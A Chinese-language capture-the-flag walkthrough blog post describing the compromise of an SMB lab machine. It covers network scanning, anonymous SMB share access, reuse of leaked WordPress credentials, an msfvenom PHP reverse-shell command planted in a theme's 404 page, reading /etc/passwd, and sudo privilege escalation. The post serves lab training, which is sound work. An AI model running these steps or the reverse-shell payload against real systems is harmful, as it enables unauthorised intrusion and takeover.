CTF-SMB渗透

环境

Kali ip 192.168.56.102

Smb 靶机ip 192.168.56.103  靶场下载:

链接：https://pan.baidu.com/s/1OwNjBf7ZEGmFlRq79bkD_A
提取码：0eg6

 

信息探测

使用netdiscover -r ip/mask 进行内网网段存活ip探测

 

 

 

 

靶机为103

 

 

 

进行nmap端口探测和服务信息探测

 

nmap -sV -T4 -A 192.168.56.103

 

 

 

 

 

 

可以看到smb服务

 

针对SMB协议，使用空口令，若口令尝试登陆，并查看敏感文件，下载查看

 

 

0x01针对于开放服务进行弱口令尝试

smbclient -L 192.168.56.103

 

 

连接成功

 

分别查看三个共享连接是否有flag等敏感文件

 

smbclient ‘\\IP\$share’  查看文件

 

 

尝试到share$连接时 发现可以空口令连接

 

查看文件

 

 

 

 

Robots.txt里的目录 每个查看后无果

查看deets.txt

 

 

 

 

发现一个密码为12345

然后继续查看敏感文件

 

Cd 到wordpress目录

 

 

 

 

 

发现敏感文件wp-config.php

 

 

 

 

 

读取到数据密码

尝试用数据库密码和12345登录到Mysql  ssh

 

 

 

 

 

 

均失败

 

0x02针对于开放服务器的版本 尝试溢出漏洞

 

尝试searchsploit samba版本号 看看有没有现成的溢出漏洞

尝试过后无果

 

 

0x03针对于开放服务 进行深入信息探测

主机开放了80端口 针对于http服务 再次做信息探测

 

使用到的工具 dirb nikto owasp-zap进行目录扫描 漏洞扫描

 

 

 

 

 

 

 

 

 

 

发现后台地址

http://192.168.56.103/wordpress/wp-admin/

 

 

尝试使用我们得到的数据库密码和之前12345登录

 

使用数据库密码登录后台成功

 

 

 

 

后台程序为wordpress

想办法上传我们的webshell

 

 

0x04 webshell生成和上传

 

使用msfvenom生成php反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

 

 

 

 

 

 

 

后台上传webshell

 

 

 

 

在后台的模版 可以直接插入我们的php代码

 

 

我插入的404页面的代码

 

 

保存成功后  msf开始监听反弹的shell

 

 

 

 

 

 

 

 

 

访问靶机404.php 执行反弹shell

http://靶场IP/wordpress/wp-content/themes/twenty

Fifteen/404.php

 

 

 

 

 

拿到shell后  找到和flag有关的信息和文件

优化终端：

python -c "import pty; pty.spawn('/bin/bash')"

 

 

 

 

 

先查找用户名: cat /etc/passwd

 

 

 

 

发现有个在home目录下的togie 猜测是用户名

 

 

 

--  su  用户名

--  sudo –l

--  su sudo

 

尝试切换到togie用户 发现需要密码 输入之前得到的12345

 

切换成功

 

 

 

 

查看root可以执行哪些目录的操作

sudo -l

 

 

发现有这些目录

 

 

提升权限

 

Sudo su

 

 

root目录下

 

 

最后成功拿到查看flag.txt 拿到flag

 

 

 

完毕。

 

posted @ 2018-11-28 17:51 卿先生 阅读(...) 评论(...) 编辑 收藏